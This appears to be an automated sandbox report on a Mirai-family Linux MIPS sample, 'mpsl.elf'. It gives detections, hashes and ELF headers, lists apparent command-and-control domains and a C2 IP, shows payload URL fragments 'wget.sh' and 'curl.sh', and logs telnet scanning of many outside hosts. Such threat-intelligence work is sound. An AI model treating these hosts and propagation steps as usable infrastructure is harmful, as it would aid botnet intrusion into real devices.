                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
                Non-Standard Port
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
                Application Layer Protocol
                Traffic DuplicationData Destruction
                No configs have been found
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Number of created Files
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1611410 Sample: mpsl.elf Startdate: 10/02/2025 Architecture: LINUX Score: 84 25 thekittler.ru. [malformed] 2->25 27 mykittler.ru. [malformed] 2->27 29 59 other IPs or domains 2->29 33 Antivirus / Scanner detection for submitted sample 2->33 35 Multi AV Scanner detection for submitted file 2->35 37 Yara detected Mirai 2->37 39 Connects to many ports of the same IP (likely port scanning) 2->39 8 mpsl.elf 2->8         started        10 xfce4-session rm 2->10         started        12 xfce4-session xfwm4 2->12         started        14 12 other processes 2->14 signatures3 41 Sends malformed DNS queries 27->41 process4 process5 16 mpsl.elf 8->16         started        process6 18 mpsl.elf 16->18         started        21 mpsl.elf 16->21         started        23 mpsl.elf 16->23         started        signatures7 31 Sample tries to kill multiple processes (SIGKILL) 18->31
                SourceDetectionScannerLabelLink
                mpsl.elf42%ReversingLabsLinux.Exploit.Mirai
                mpsl.elf100%AviraEXP/ELF.Mirai.W
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                NameIPActiveMaliciousAntivirus DetectionReputation
                newkittler.ru
                185.93.89.106
                truefalse
                  high
                  cats-master.ru
                  185.93.89.106
                  truefalse
                    high
                    kittlerer.ru
                    185.93.89.106
                    truefalse
                      high
                      qittler.ru. [malformed]
                      unknown
                      unknownfalse
                        high
                        gokittler.ru. [malformed]
                        unknown
                        unknowntrue
                          unknown
                          kittler.ru. [malformed]
                          unknown
                          unknownfalse
                            high
                            cats-master.ru. [malformed]
                            unknown
                            unknowntrue
                              unknown
                              thekittler.ru. [malformed]
                              unknown
                              unknowntrue
                                unknown
                                cuttiecats.ru. [malformed]
                                unknown
                                unknowntrue
                                  unknown
                                  cat-are-here.ru. [malformed]
                                  unknown
                                  unknowntrue
                                    unknown
                                    mykittler.ru. [malformed]
                                    unknown
                                    unknowntrue
                                      unknown
                                      polizei.su. [malformed]
                                      unknown
                                      unknownfalse
                                        high
                                        kittlez.ru. [malformed]
                                        unknown
                                        unknownfalse
                                          high
                                          NameSourceMaliciousAntivirus DetectionReputation
                                          http:///wget.shmpsl.elffalse
                                            high
                                            http:///curl.shmpsl.elffalse
                                              high
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
                                              IPDomainCountryFlagASNASN NameMalicious
                                              4.226.234.4
                                              unknownUnited States
                                              3356LEVEL3USfalse
                                              212.225.56.10
                                              unknownUnited Kingdom
                                              2529DEMON-INTERNETNowmaintainedbyCableWirelessWorldwidefalse
                                              198.125.69.222
                                              unknownUnited States
                                              291ESNET-EASTUSfalse
                                              76.224.64.167
                                              unknownUnited States
                                              7018ATT-INTERNET4USfalse
                                              2.229.119.203
                                              unknownItaly
                                              12874FASTWEBITfalse
                                              119.91.247.155
                                              unknownChina
                                              24143CNNIC-QCN-APQingdaoCableTVNetworkCenterCNfalse
                                              85.25.61.237
                                              unknownGermany
                                              8972GD-EMEA-DC-SXB1DEfalse
                                              109.85.245.208
                                              unknownGermany
                                              3209VODANETInternationalIP-BackboneofVodafoneDEfalse
                                              48.130.37.45
                                              unknownUnited States
                                              2686ATGS-MMD-ASUSfalse
                                              116.33.52.90
                                              unknownKorea Republic of
                                              17858POWERVIS-AS-KRLGPOWERCOMMKRfalse
                                              91.189.91.43
                                              unknownUnited Kingdom
                                              41231CANONICAL-ASGBfalse
                                              91.189.91.42
                                              unknownUnited Kingdom
                                              41231CANONICAL-ASGBfalse
                                              84.148.98.147
                                              unknownGermany
                                              3320DTAGInternetserviceprovideroperationsDEfalse
                                              200.75.33.18
                                              unknownColombia
                                              19429ETB-ColombiaCOfalse
                                              41.126.85.162
                                              unknownSouth Africa
                                              16637MTNNS-ASZAfalse
                                              200.193.231.216
                                              unknownBrazil
                                              8167BrasilTelecomSA-FilialDistritoFederalBRfalse
                                              167.57.47.185
                                              unknownUruguay
                                              6057AdministracionNacionaldeTelecomunicacionesUYfalse
                                              94.105.81.74
                                              unknownBelgium
                                              47377ORANGE_BELGIUM_SAKPNBelgiumBusinessNVhasbeenacquiredfalse
                                              32.240.96.51
                                              unknownUnited States
                                              2686ATGS-MMD-ASUSfalse
                                              14.187.67.174
                                              unknownViet Nam
                                              45899VNPT-AS-VNVNPTCorpVNfalse
                                              131.147.132.9
                                              unknownJapan2527SO-NETSo-netEntertainmentCorporationJPfalse
                                              165.218.132.155
                                              unknownUnited States
                                              2381WISCNET1-ASUSfalse
                                              195.25.99.200
                                              unknownFrance
                                              3215FranceTelecom-OrangeFRfalse
                                              182.58.57.172
                                              unknownIndia
                                              17813MTNL-APMahanagarTelephoneNigamLimitedINfalse
                                              179.227.37.131
                                              unknownBrazil
                                              26599TELEFONICABRASILSABRfalse
                                              99.58.237.214
                                              unknownUnited States
                                              7018ATT-INTERNET4USfalse
                                              74.69.249.210
                                              unknownUnited States
                                              11351TWC-11351-NORTHEASTUSfalse
                                              78.245.106.184
                                              unknownFrance
                                              12322PROXADFRfalse
                                              34.111.106.211
                                              unknownUnited States
                                              15169GOOGLEUSfalse
                                              115.96.123.252
                                              unknownIndia
                                              17488HATHWAY-NET-APHathwayIPOverCableInternetINfalse
                                              113.91.171.126
                                              unknownChina
                                              4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                              173.161.235.67
                                              unknownUnited States
                                              7922COMCAST-7922USfalse
                                              212.237.38.75
                                              unknownItaly
                                              31034ARUBA-ASNITfalse
                                              96.193.16.6
                                              unknownUnited States
                                              7922COMCAST-7922USfalse
                                              184.15.146.122
                                              unknownUnited States
                                              7011FRONTIER-AND-CITIZENSUSfalse
                                              185.165.2.79
                                              unknownSpain
                                              29119SERVIHOSTING-ASAireNetworksESfalse
                                              21.205.134.202
                                              unknownUnited States
                                              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                              178.218.49.197
                                              unknownRussian Federation
                                              50789AIRONET-ASRUfalse
                                              185.93.89.106
                                              newkittler.ruUnited Kingdom
                                              200861TS-EMEA-ASNGBfalse
                                              62.109.161.137
                                              unknownRussian Federation
                                              24783ASN-MELS-MURMANELECTROSVIAZRUfalse
                                              120.128.61.54
                                              unknownChina
                                              4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                                              109.202.202.202
                                              unknownSwitzerland
                                              13030INIT7CHfalse
                                              9.138.94.12
                                              unknownUnited States
                                              3356LEVEL3USfalse
                                              26.198.108.109
                                              unknownUnited States
                                              7922COMCAST-7922USfalse
                                              33.200.209.105
                                              unknownUnited States
                                              2686ATGS-MMD-ASUSfalse
                                              119.174.32.119
                                              unknownJapan9824JTCL-JP-ASJupiterTelecommunicationCoLtdJPfalse
                                              103.55.183.129
                                              unknownIndia
                                              63974RFG-AURETAILFOODGROUPLIMITEDAUfalse
                                              61.226.72.47
                                              unknownTaiwan; Republic of China (ROC)
                                              3462HINETDataCommunicationBusinessGroupTWfalse
                                              96.230.6.227
                                              unknownUnited States
                                              701UUNETUSfalse
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              91.189.91.43na.elfGet hashmaliciousPrometeiBrowse
                                                arm4.elfGet hashmaliciousMiraiBrowse
                                                  dlr.mips.elfGet hashmaliciousMiraiBrowse
                                                    arm6.elfGet hashmaliciousMiraiBrowse
                                                      rep.m68k.elfGet hashmaliciousMiraiBrowse
                                                        na.elfGet hashmaliciousPrometeiBrowse
                                                          mips.elfGet hashmaliciousMiraiBrowse
                                                            arm7.elfGet hashmaliciousMiraiBrowse
                                                              dlr.arm7.elfGet hashmaliciousMiraiBrowse
                                                                dlr.arm5.elfGet hashmaliciousUnknownBrowse
                                                                  91.189.91.42na.elfGet hashmaliciousPrometeiBrowse
                                                                    arm4.elfGet hashmaliciousMiraiBrowse
                                                                      dlr.mips.elfGet hashmaliciousMiraiBrowse
                                                                        arm6.elfGet hashmaliciousMiraiBrowse
                                                                          rep.m68k.elfGet hashmaliciousMiraiBrowse
                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                              mips.elfGet hashmaliciousMiraiBrowse
                                                                                arm7.elfGet hashmaliciousMiraiBrowse
                                                                                  dlr.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                    dlr.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      cats-master.ruarm7.elfGet hashmaliciousMiraiBrowse
                                                                                      • 185.93.89.106
                                                                                      rep.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                      • 156.229.232.99
                                                                                      arm4.elfGet hashmaliciousUnknownBrowse
                                                                                      • 156.229.232.99
                                                                                      newkittler.rurep.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                      • 156.229.232.99
                                                                                      rep.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                      • 156.229.232.99
                                                                                      kittlerer.ruKloki.mpsl.elfGet hashmaliciousGafgytBrowse
                                                                                      • 83.222.190.91
                                                                                      arm5.elfGet hashmaliciousUnknownBrowse
                                                                                      • 156.229.232.99
                                                                                      rep.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                      • 156.229.232.99
                                                                                      rep.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                      • 156.229.232.99
                                                                                      rep.arm4.elfGet hashmaliciousUnknownBrowse
                                                                                      • 156.229.232.99
                                                                                      rep.x86_64.elfGet hashmaliciousUnknownBrowse
                                                                                      • 156.229.232.99
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      DEMON-INTERNETNowmaintainedbyCableWirelessWorldwideres.mips.elfGet hashmaliciousUnknownBrowse
                                                                                      • 212.240.3.155
                                                                                      nklmpsl.elfGet hashmaliciousUnknownBrowse
                                                                                      • 212.225.89.73
                                                                                      boatnet.mips.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                      • 158.153.1.92
                                                                                      sora.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                      • 158.156.17.59
                                                                                      Fantazy.arm4.elfGet hashmaliciousUnknownBrowse
                                                                                      • 193.195.116.175
                                                                                      sora.mips.elfGet hashmaliciousMiraiBrowse
                                                                                      • 80.177.171.212
                                                                                      g4za.mips.elfGet hashmaliciousMiraiBrowse
                                                                                      • 83.105.110.39
                                                                                      sora.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                      • 158.152.124.223
                                                                                      m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                      • 83.107.135.95
                                                                                      Fantazy.x86.elfGet hashmaliciousUnknownBrowse
                                                                                      • 194.70.52.179
                                                                                      LEVEL3USrep.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                      • 6.103.233.186
                                                                                      mips.elfGet hashmaliciousMiraiBrowse
                                                                                      • 11.152.5.38
                                                                                      botnet.arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                      • 4.123.243.170
                                                                                      botnet.arm5.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                      • 9.185.142.254
                                                                                      botnet.sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                      • 9.62.63.196
                                                                                      botnet.mpsl.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                      • 205.183.205.156
                                                                                      .Sarm5.elfGet hashmaliciousMiraiBrowse
                                                                                      • 4.121.33.159
                                                                                      botnet.mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                      • 4.130.250.204
                                                                                      botnet.spc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                      • 8.198.8.253
                                                                                      x86_64.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                      • 157.199.249.207
                                                                                      ATT-INTERNET4UShttps://doxnero.sg-azure.top/Get hashmaliciousUnknownBrowse
                                                                                      • 13.32.27.129
                                                                                      https://doxnero.sg-azure.top/Get hashmaliciousUnknownBrowse
                                                                                      • 13.32.27.129
                                                                                      https://doxnero.sg-azure.top/Get hashmaliciousHTMLPhisherBrowse
                                                                                      • 13.32.27.77
                                                                                      botnet.arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                      • 71.150.49.241
                                                                                      botnet.arm5.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                      • 76.226.188.97
                                                                                      botnet.mpsl.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                      • 71.154.187.46
                                                                                      botnet.m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                      • 99.74.241.164
                                                                                      botnet.arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                      • 75.30.165.111
                                                                                      botnet.mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                      • 74.237.221.88
                                                                                      botnet.spc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                      • 12.38.242.146
                                                                                      ESNET-EASTUSnabm68k.elfGet hashmaliciousUnknownBrowse
                                                                                      • 198.124.18.126
                                                                                      mpsl-wrt.elfGet hashmaliciousUnknownBrowse
                                                                                      • 198.124.161.118
                                                                                      res.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                      • 198.125.175.180
                                                                                      sora.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                      • 198.127.95.152
                                                                                      sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                      • 198.127.95.191
                                                                                      sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                      • 198.127.83.97
                                                                                      mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                      • 198.127.47.223
                                                                                      arm7.elfGet hashmaliciousMiraiBrowse
                                                                                      • 198.127.34.64
                                                                                      spc.elfGet hashmaliciousMiraiBrowse
                                                                                      • 198.127.34.64
                                                                                      arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                      • 198.125.204.6
                                                                                      No context
                                                                                      No context
                                                                                      No created / dropped files found
                                                                                      File type:ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
                                                                                      Entropy (8bit):5.723876301252058
                                                                                      TrID:
                                                                                      • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                                      File name:mpsl.elf
                                                                                      File size:121'692 bytes
                                                                                      MD5:006a9f92b1832282b8be08d734c54df9
                                                                                      SHA1:1b1d9af01b6aa83488277ad3e76ff5e673b88ea1
                                                                                      SHA256:e622a68781028bc9b322a1ad66d092295ac96203bd7adf39c19009de6e1146bb
                                                                                      SHA512:12bf2104a57c04830e249e636ea9325134d6b04fed6df078f905e361a9cc078d7deb23ca38688a4c24efc0f318a3df8108370bf676810b98bb94bb1ef9340d70
                                                                                      SSDEEP:1536:ftg30NfXC5AIb+bjJrQBHppTaOvYD73SU6hgCsqaiIBUtrACbj7EW2PWjwqLtiC5:feEVXCOIb+69bEi54mEW9HBiCKn
                                                                                      TLSH:A8C38227EB246EF7D4EBCC72D2B9CB0925DD994931A427F56430E824B68740F86978F0
                                                                                      File Content Preview:.ELF....................`.@.4...,.......4. ...(...............@...@.0...0.....................E...E......:..........Q.td...............................<.S.'!......'.......................<hS.'!... .........9'.. ........................<8S.'!.............9

                                                                                      ELF header

                                                                                      Class:ELF32
                                                                                      Data:2's complement, little endian
                                                                                      Version:1 (current)
                                                                                      Machine:MIPS R3000
                                                                                      Version Number:0x1
                                                                                      Type:EXEC (Executable file)
                                                                                      OS/ABI:UNIX - System V
                                                                                      ABI Version:0
                                                                                      Entry Point Address:0x400260
                                                                                      Flags:0x1007
                                                                                      ELF Header Size:52
                                                                                      Program Header Offset:52
                                                                                      Program Header Size:32
                                                                                      Number of Program Headers:3
                                                                                      Section Header Offset:121132
                                                                                      Section Header Size:40
                                                                                      Number of Section Headers:14
                                                                                      Header String Table Index:13
                                                                                      NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                                      NULL0x00x00x00x00x0000
                                                                                      .initPROGBITS0x4000940x940x8c0x00x6AX004
                                                                                      .textPROGBITS0x4001200x1200x19d300x00x6AX0016
                                                                                      .finiPROGBITS0x419e500x19e500x5c0x00x6AX004
                                                                                      .rodataPROGBITS0x419eb00x19eb00x30800x00x2A0016
                                                                                      .ctorsPROGBITS0x45d0000x1d0000x80x00x3WA004
                                                                                      .dtorsPROGBITS0x45d0080x1d0080x80x00x3WA004
                                                                                      .data.rel.roPROGBITS0x45d0140x1d0140xe00x00x3WA004
                                                                                      .dataPROGBITS0x45d1000x1d1000x3300x00x3WA0016
                                                                                      .gotPROGBITS0x45d4300x1d4300x4980x40x10000003WAp0016
                                                                                      .sbssNOBITS0x45d8c80x1d8c80x240x00x10000003WAp004
                                                                                      .bssNOBITS0x45d8f00x1d8c80x31c80x00x3WA0016
                                                                                      .mdebug.abi32PROGBITS0x9ea0x1d8c80x00x00x0001
                                                                                      .shstrtabSTRTAB0x00x1d8c80x640x00x0001
                                                                                      TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                                      LOAD0x00x4000000x4000000x1cf300x1cf305.74940x5R E0x10000.init .text .fini .rodata
                                                                                      LOAD0x1d0000x45d0000x45d0000x8c80x3ab83.66940x6RW 0x10000.ctors .dtors .data.rel.ro .data .got .sbss .bss
                                                                                      GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Feb 10, 2025 21:08:10.517976999 CET5240823192.168.2.23200.75.33.18
                                                                                      Feb 10, 2025 21:08:10.522573948 CET4817423192.168.2.23120.128.61.54
                                                                                      Feb 10, 2025 21:08:10.525218010 CET4946423192.168.2.23173.161.235.67
                                                                                      Feb 10, 2025 21:08:10.528652906 CET3979023192.168.2.23103.55.183.129
                                                                                      Feb 10, 2025 21:08:10.532289982 CET3940623192.168.2.23131.147.132.9
                                                                                      Feb 10, 2025 21:08:10.535634995 CET3479623192.168.2.2374.69.249.210
                                                                                      Feb 10, 2025 21:08:10.538039923 CET5330623192.168.2.2341.126.85.162
                                                                                      Feb 10, 2025 21:08:10.541181087 CET5249023192.168.2.2321.205.134.202
                                                                                      Feb 10, 2025 21:08:10.543661118 CET5590623192.168.2.239.138.94.12
                                                                                      Feb 10, 2025 21:08:10.547106981 CET3540623192.168.2.232.229.119.203
                                                                                      Feb 10, 2025 21:08:10.549431086 CET4690623192.168.2.2334.111.106.211
                                                                                      Feb 10, 2025 21:08:10.554373026 CET3886623192.168.2.23119.174.32.119
                                                                                      Feb 10, 2025 21:08:10.556859970 CET5803823192.168.2.23115.96.123.252
                                                                                      Feb 10, 2025 21:08:10.559685946 CET5509823192.168.2.2384.148.98.147
                                                                                      Feb 10, 2025 21:08:10.562087059 CET5426623192.168.2.2361.226.72.47
                                                                                      Feb 10, 2025 21:08:10.564789057 CET4886423192.168.2.23198.125.69.222
                                                                                      Feb 10, 2025 21:08:10.583036900 CET3957023192.168.2.23167.57.47.185
                                                                                      Feb 10, 2025 21:08:10.613672972 CET4398423192.168.2.2348.130.37.45
                                                                                      Feb 10, 2025 21:08:10.616638899 CET3565223192.168.2.23113.91.171.126
                                                                                      Feb 10, 2025 21:08:10.621866941 CET4037623192.168.2.2394.105.81.74
                                                                                      Feb 10, 2025 21:08:10.629266024 CET3628823192.168.2.2385.25.61.237
                                                                                      Feb 10, 2025 21:08:10.633100986 CET3931023192.168.2.23212.237.38.75
                                                                                      Feb 10, 2025 21:08:10.644994020 CET2352408200.75.33.18192.168.2.23
                                                                                      Feb 10, 2025 21:08:10.645010948 CET2348174120.128.61.54192.168.2.23
                                                                                      Feb 10, 2025 21:08:10.645021915 CET2349464173.161.235.67192.168.2.23
                                                                                      Feb 10, 2025 21:08:10.645031929 CET2339790103.55.183.129192.168.2.23
                                                                                      Feb 10, 2025 21:08:10.645045996 CET2339406131.147.132.9192.168.2.23
                                                                                      Feb 10, 2025 21:08:10.645056963 CET233479674.69.249.210192.168.2.23
                                                                                      Feb 10, 2025 21:08:10.645072937 CET235330641.126.85.162192.168.2.23
                                                                                      Feb 10, 2025 21:08:10.645078897 CET235249021.205.134.202192.168.2.23
                                                                                      Feb 10, 2025 21:08:10.645085096 CET23559069.138.94.12192.168.2.23
                                                                                      Feb 10, 2025 21:08:10.645093918 CET23354062.229.119.203192.168.2.23
                                                                                      Feb 10, 2025 21:08:10.645104885 CET234690634.111.106.211192.168.2.23
                                                                                      Feb 10, 2025 21:08:10.645106077 CET4946423192.168.2.23173.161.235.67
                                                                                      Feb 10, 2025 21:08:10.645107985 CET5240823192.168.2.23200.75.33.18
                                                                                      Feb 10, 2025 21:08:10.645108938 CET4817423192.168.2.23120.128.61.54
                                                                                      Feb 10, 2025 21:08:10.645111084 CET3979023192.168.2.23103.55.183.129
                                                                                      Feb 10, 2025 21:08:10.645116091 CET2338866119.174.32.119192.168.2.23
                                                                                      Feb 10, 2025 21:08:10.645122051 CET3940623192.168.2.23131.147.132.9
                                                                                      Feb 10, 2025 21:08:10.645122051 CET5249023192.168.2.2321.205.134.202
                                                                                      Feb 10, 2025 21:08:10.645127058 CET2358038115.96.123.252192.168.2.23
                                                                                      Feb 10, 2025 21:08:10.645133018 CET5330623192.168.2.2341.126.85.162
                                                                                      Feb 10, 2025 21:08:10.645137072 CET235509884.148.98.147192.168.2.23
                                                                                      Feb 10, 2025 21:08:10.645147085 CET5590623192.168.2.239.138.94.12
                                                                                      Feb 10, 2025 21:08:10.645147085 CET3479623192.168.2.2374.69.249.210
                                                                                      Feb 10, 2025 21:08:10.645147085 CET3886623192.168.2.23119.174.32.119
                                                                                      Feb 10, 2025 21:08:10.645148993 CET235426661.226.72.47192.168.2.23
                                                                                      Feb 10, 2025 21:08:10.645158052 CET4690623192.168.2.2334.111.106.211
                                                                                      Feb 10, 2025 21:08:10.645159006 CET3540623192.168.2.232.229.119.203
                                                                                      Feb 10, 2025 21:08:10.645159006 CET2348864198.125.69.222192.168.2.23
                                                                                      Feb 10, 2025 21:08:10.645172119 CET2339570167.57.47.185192.168.2.23
                                                                                      Feb 10, 2025 21:08:10.645181894 CET5803823192.168.2.23115.96.123.252
                                                                                      Feb 10, 2025 21:08:10.645181894 CET5509823192.168.2.2384.148.98.147
                                                                                      Feb 10, 2025 21:08:10.645184994 CET234398448.130.37.45192.168.2.23
                                                                                      Feb 10, 2025 21:08:10.645190001 CET4886423192.168.2.23198.125.69.222
                                                                                      Feb 10, 2025 21:08:10.645195961 CET2335652113.91.171.126192.168.2.23
                                                                                      Feb 10, 2025 21:08:10.645205975 CET234037694.105.81.74192.168.2.23
                                                                                      Feb 10, 2025 21:08:10.645210981 CET3957023192.168.2.23167.57.47.185
                                                                                      Feb 10, 2025 21:08:10.645219088 CET233628885.25.61.237192.168.2.23
                                                                                      Feb 10, 2025 21:08:10.645231962 CET4398423192.168.2.2348.130.37.45
                                                                                      Feb 10, 2025 21:08:10.645246983 CET4037623192.168.2.2394.105.81.74
                                                                                      Feb 10, 2025 21:08:10.645256996 CET3628823192.168.2.2385.25.61.237
                                                                                      Feb 10, 2025 21:08:10.645270109 CET5426623192.168.2.2361.226.72.47
                                                                                      Feb 10, 2025 21:08:10.645270109 CET3565223192.168.2.23113.91.171.126
                                                                                      Feb 10, 2025 21:08:10.645525932 CET2339310212.237.38.75192.168.2.23
                                                                                      Feb 10, 2025 21:08:10.650299072 CET3931023192.168.2.23212.237.38.75
                                                                                      Feb 10, 2025 21:08:10.654331923 CET5569023192.168.2.23179.227.37.131
                                                                                      Feb 10, 2025 21:08:10.659142971 CET2355690179.227.37.131192.168.2.23
                                                                                      Feb 10, 2025 21:08:10.659342051 CET5569023192.168.2.23179.227.37.131
                                                                                      Feb 10, 2025 21:08:10.712424040 CET3975238241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:10.717407942 CET3824139752185.93.89.106192.168.2.23
                                                                                      Feb 10, 2025 21:08:10.717933893 CET3975238241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:10.723608017 CET4017023192.168.2.23119.91.247.155
                                                                                      Feb 10, 2025 21:08:10.728445053 CET2340170119.91.247.155192.168.2.23
                                                                                      Feb 10, 2025 21:08:10.728518963 CET4017023192.168.2.23119.91.247.155
                                                                                      Feb 10, 2025 21:08:10.739327908 CET4652023192.168.2.23195.25.99.200
                                                                                      Feb 10, 2025 21:08:10.740315914 CET3975238241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:10.744216919 CET2346520195.25.99.200192.168.2.23
                                                                                      Feb 10, 2025 21:08:10.745094061 CET3824139752185.93.89.106192.168.2.23
                                                                                      Feb 10, 2025 21:08:10.745183945 CET4652023192.168.2.23195.25.99.200
                                                                                      Feb 10, 2025 21:08:10.746246099 CET3975238241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:10.748476982 CET4804423192.168.2.23200.193.231.216
                                                                                      Feb 10, 2025 21:08:10.751043081 CET3824139752185.93.89.106192.168.2.23
                                                                                      Feb 10, 2025 21:08:10.753017902 CET5282023192.168.2.2362.109.161.137
                                                                                      Feb 10, 2025 21:08:10.753273010 CET2348044200.193.231.216192.168.2.23
                                                                                      Feb 10, 2025 21:08:10.753329992 CET4804423192.168.2.23200.193.231.216
                                                                                      Feb 10, 2025 21:08:10.757800102 CET235282062.109.161.137192.168.2.23
                                                                                      Feb 10, 2025 21:08:10.757853985 CET5282023192.168.2.2362.109.161.137
                                                                                      Feb 10, 2025 21:08:10.781337023 CET3680623192.168.2.2376.224.64.167
                                                                                      Feb 10, 2025 21:08:10.786298990 CET233680676.224.64.167192.168.2.23
                                                                                      Feb 10, 2025 21:08:10.786369085 CET3680623192.168.2.2376.224.64.167
                                                                                      Feb 10, 2025 21:08:10.787666082 CET4153423192.168.2.23109.85.245.208
                                                                                      Feb 10, 2025 21:08:10.792494059 CET2341534109.85.245.208192.168.2.23
                                                                                      Feb 10, 2025 21:08:10.793525934 CET4153423192.168.2.23109.85.245.208
                                                                                      Feb 10, 2025 21:08:10.794142962 CET4917423192.168.2.2396.230.6.227
                                                                                      Feb 10, 2025 21:08:10.798971891 CET234917496.230.6.227192.168.2.23
                                                                                      Feb 10, 2025 21:08:10.800614119 CET4917423192.168.2.2396.230.6.227
                                                                                      Feb 10, 2025 21:08:10.801229954 CET5800023192.168.2.2314.187.67.174
                                                                                      Feb 10, 2025 21:08:10.806054115 CET235800014.187.67.174192.168.2.23
                                                                                      Feb 10, 2025 21:08:10.806180000 CET5800023192.168.2.2314.187.67.174
                                                                                      Feb 10, 2025 21:08:10.807785034 CET5510823192.168.2.234.226.234.4
                                                                                      Feb 10, 2025 21:08:10.812320948 CET4260423192.168.2.2399.58.237.214
                                                                                      Feb 10, 2025 21:08:10.812551975 CET23551084.226.234.4192.168.2.23
                                                                                      Feb 10, 2025 21:08:10.812609911 CET5510823192.168.2.234.226.234.4
                                                                                      Feb 10, 2025 21:08:10.817126036 CET234260499.58.237.214192.168.2.23
                                                                                      Feb 10, 2025 21:08:10.821680069 CET4260423192.168.2.2399.58.237.214
                                                                                      Feb 10, 2025 21:08:10.855710030 CET3556223192.168.2.23116.33.52.90
                                                                                      Feb 10, 2025 21:08:10.860519886 CET2335562116.33.52.90192.168.2.23
                                                                                      Feb 10, 2025 21:08:10.860583067 CET3556223192.168.2.23116.33.52.90
                                                                                      Feb 10, 2025 21:08:10.863591909 CET4135223192.168.2.23185.165.2.79
                                                                                      Feb 10, 2025 21:08:10.868411064 CET2341352185.165.2.79192.168.2.23
                                                                                      Feb 10, 2025 21:08:10.868491888 CET4135223192.168.2.23185.165.2.79
                                                                                      Feb 10, 2025 21:08:10.872783899 CET3349423192.168.2.23178.218.49.197
                                                                                      Feb 10, 2025 21:08:10.877557039 CET2333494178.218.49.197192.168.2.23
                                                                                      Feb 10, 2025 21:08:10.877621889 CET3349423192.168.2.23178.218.49.197
                                                                                      Feb 10, 2025 21:08:10.879869938 CET4598023192.168.2.23212.225.56.10
                                                                                      Feb 10, 2025 21:08:10.884639978 CET2345980212.225.56.10192.168.2.23
                                                                                      Feb 10, 2025 21:08:10.884692907 CET4598023192.168.2.23212.225.56.10
                                                                                      Feb 10, 2025 21:08:10.886535883 CET5085623192.168.2.2333.200.209.105
                                                                                      Feb 10, 2025 21:08:10.891401052 CET235085633.200.209.105192.168.2.23
                                                                                      Feb 10, 2025 21:08:10.891453981 CET5085623192.168.2.2333.200.209.105
                                                                                      Feb 10, 2025 21:08:10.893090963 CET5151823192.168.2.2396.193.16.6
                                                                                      Feb 10, 2025 21:08:10.897399902 CET5227623192.168.2.23165.218.132.155
                                                                                      Feb 10, 2025 21:08:10.897830009 CET235151896.193.16.6192.168.2.23
                                                                                      Feb 10, 2025 21:08:10.898072958 CET5151823192.168.2.2396.193.16.6
                                                                                      Feb 10, 2025 21:08:10.902198076 CET2352276165.218.132.155192.168.2.23
                                                                                      Feb 10, 2025 21:08:10.902313948 CET5227623192.168.2.23165.218.132.155
